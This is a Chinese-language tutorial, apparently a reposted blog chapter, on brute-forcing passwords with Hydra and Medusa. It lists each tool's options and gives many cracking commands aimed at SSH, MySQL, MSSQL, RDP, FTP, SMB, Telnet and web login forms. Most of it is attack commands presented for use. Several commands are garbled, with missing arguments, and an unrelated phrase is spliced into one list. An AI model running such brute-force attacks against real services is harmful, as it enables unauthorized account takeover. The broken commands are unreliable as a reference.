渗透利器-kali⼯具(第六章-2)利⽤hydra暴⼒破解密码
本⽂内容:
hydra简介
hydra安装配置
hrdra破解
Medusa
1,hydra简介:
  hydra的中⽂意思是就透彻,它是⼀款爆破神器,可以对多种服务的账号和密码进⾏爆破,包括Web登录、数据库、SSH、Ftp等服务。  ⽀持Linux、Windows、Mac平台安装,其中Kali Linux中⾃带hydra。
  Hydra⽀持的服务有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL……
  最⼤的安全漏洞之⼀是弱⼝令。
2,hydra安装配置:
  Kali Linux中hydra⾃带。
    Kali是安全从业⼈员常⽤的Linux系统,⾃带有⼤量安全⼯具,hydra⾃然也继承在⾥⾯。
    ⼯具位置:密码攻击--在线攻击⼀栏
  Windows中hydra安装:
3,hydra破解:
  1.hydra相关参数:
    -l    LOGIN  指定破解的⽤户名成,对特定⽤户破解
    -L   FILE   从⽂件中加载⽤户名进⾏破解。
    -p   PASS   ⼩写p执⾏密码破解,少⽤,⼀般是采⽤密码字典。
    -P  FILE   ⼤写字母P,指定密码字典。
    -e          ns 可选选项,n:空密码试探,s:使⽤指定⽤户和密码[相同]试探。
    -C   FILE   使⽤冒号分隔格式,例如"登录:密码"来代替-L/-P参数。
    -t   TASKS  同时运⾏的链接的线程数,每⼀台主机默认为16
    -M  FILE  指定服务器⽬标列表⽂件⼀⾏⼀条。
    -w   TIME  设置最⼤超时的时间,单位秒,默认是30s。
    -O  FILE   指定结果输出⽂件。
    -f       在使⽤-M参数以后,到第⼀对登录名或者密码的时候终⽌破解。
    -v/-V      显⽰详细过程。
    -R      继续从上⼀次进度接着破解。
    -S       采⽤SSL链接。
    -s   PORT  可通过这个参数指定⾮默认端⼝。
    -U      服务模块使⽤细节
    -h     更多的命令⾏选项[完成的帮助]
    server     ⽬标服务器名称或者IP[使⽤这个或-M选项]
    service     指定服务名,⽀持的服务核协议telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
    OPT ⼀些服务模块⽀持额外的输⼊[-U⽤于模块的帮助]
    例如:[⽤法]:   
      hydra -l user - ftp://192.168.0.1
      hydra - -p defaultpw imap://192.168.0.1/PLAIN
      hydra - -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra - - - ssh
  2.hydra⽤法案例:
    图形化界⾯:xhydra[推荐还是命令直接搞]
    案例1:
      破解Mysql密码
      数据库⼀般会提供⼀个默认的账户,sql server的sa与⽤户,Mysql的root⽤户,Oracle的System⽤户等。
      假如我们现在破解Mysql数据库:
        hydra - - ip mysql
        hydra - - mysql://⽬标ip:mysql端⼝号
      如果需要将爆破的过程打印出来就加个指令-v
        hydra - - -v
        mysql://⽬标ip:mysql端⼝号
      成功后会打印类似如下的信息:
        [3306][mysql] host:ip  login:sa  password:sqladmin
    案例2:
      破解SSH:
        hydra -l ⽤户名 -P 密码字典 -t 线程 -v/V -e ns -f ip ssh
        hydra -l root -P /root/桌⾯/1.txt -t 6 -V -e ns -f 192.168.62.129 ssh
        hydra -l ⽤户名 -P 密码字典 -t 线程 -o save.log -vV -f ip ssh
      命令详细:
        攻击⽬标:192.168.62.128
        使⽤的模块:ssh
        爆破⽤户名:root (-1)
        使⽤的密码字典:/ (-P)
        爆破线程数:6 (-t)
        显⽰详细信息 (-V)
        爆破成功⼀个后提⽰(-f)
    其他案例:
      1.Windows密码破解:
        hydra -l ⽤户名 -p 密码 smb://ip -vV<br>或者<br>hydra -l ⽤户名 -p 密码 smb ip –vV
      2.破解Ftp:
        hydra ip ftp -l ⽤户名 -P 密码字典 -t 线程数(默认16) –vV
        如果你发现⽬标ftp并不是在21端⼝,⽽是在其他端⼝上,可以使⽤-s参数指定正确的端⼝,其他服务同样如此      3.破解rdp:
        hydra ip rdp -l administrator - –V
      4.破解telnet:
        hydra ip telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f –V
      5.破解HTTPS:
        hydra -m /index.php -l muts - ip https
      6.Get⽅式提交,破解Web登录[不推荐,太过鸡肋]:
        hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/
      7.Post⽅式提交,破解Web登录[不⿁剑,太过鸡肋]:
        hydra -l ⽤户名 -P 密码字典  ip http-post-form
"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" -V   
  3.hydra的缺点:
    1.稳定性差,程序时常崩溃。
    2.速度控制不好,容易触发服务器屏蔽或锁死机制。
    3.每主机新建进程,没服务新建实例。
    4.⼤量⽬标破解时性能差。
4,美杜莎-Medusa:
  1.Medusa的特点:
    1.稳定性好。
    2.速度控制得当。
    3.基于线程。
ssh工具windows    4.⽀持模块少于hydra[不⽀持rdp远程桌⾯]
    5.Web-Form⽀持存在缺陷
  2.Medusa参数:   
    -h  [TEXT]         ⽬标IP
    -H   [FILE]          ⽬标主机⽂件
    -u   [TEXT]         ⽤户名
    -U  [FILE]         ⽤户名⽂件
    -p   [TEXT]          密码
    -P   [FILE]          密码⽂件
    -C  [FILE]         组合条⽬⽂件
    -O  [FILE]          ⽂件⽇志信息[保存扫描结果]
    -e           [n/s/nsN意为空密码,S意为密码与⽤户名相同
    -M  [TEXT]         模块执⾏名称
    -m   [TEXT]         传递参数到模块
    -d                    显⽰所有的模块名称
    -n  [NUM]          使⽤⾮默认端⼝
    -s                   启⽤SSL
    -r  [NUM]          重试间隔时间,默认为3秒
    -t  [NUM]           设定线程数量
    -L                   并⾏化,每个⽤户使⽤⼀个线程
    -f                   在任何主机上到第⼀个账号/密码后,停⽌破解
    -q                   显⽰模块的使⽤信息
    -v  [NUM]          详细级别(0-6)
    -w  [NUM]          错误调试级别(0-10)
    -V                    显⽰版本
    -Z   [TEXT]         继续扫描上⼀次
  3.Medusa使⽤:
    1.使⽤语法:
      medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]    2.破解MSSQL:
      medusa -h ip -u root -P / -t 5 -f -M mssql
    3.破解ssh:
      medusa -M ssh - - -p password
    4.输出⽇志⽂件:
      medusa -h ip -u sa -P / -t 5 -f -e ns -M mssql -O /ap.txt

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。